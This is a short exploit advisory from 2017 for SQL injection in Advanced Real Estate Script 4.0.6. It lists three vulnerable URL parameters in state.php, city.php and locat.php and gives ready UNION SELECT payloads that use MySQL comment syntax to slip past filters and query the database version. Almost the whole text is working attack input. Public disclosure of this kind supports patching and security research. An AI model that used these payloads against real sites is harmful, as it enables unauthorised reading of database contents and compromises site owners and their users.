Advanced Real Estate Script 4.0.6 SQL Injection
Posted on 06 March 2017
# # # # # # Exploit Title: Advanced Real Estate Script v4.0.6 - SQL Injection # Google Dork: N/A # Date: 06.03.2017 # Vendor Homepage: http://www.phpscriptsmall.com/ # Software : http://www.phpscriptsmall.com/product/advanced-real-estate-script/ # Demo: http://www.phprealestatescript.org/advanced_realestate/ # Version: 4.0.6 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[@]ihsan[.]net # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/state.php?country=[SQL] # http://localhost/[PATH]/city.php?city=[SQL] # http://localhost/[PATH]/locat.php?locat=[SQL] # For example; # -1'+/*!50000union*/+select+1,2,3,4,@@version,6-- - # -1'+/*!50000union*/+select+1,2,3,4,5,@@version,7,8,9-- - # -1'+/*!50000union*/+select+1,2,3,4,5,6,@@version,8-- - # Etc... Etc... # # # # #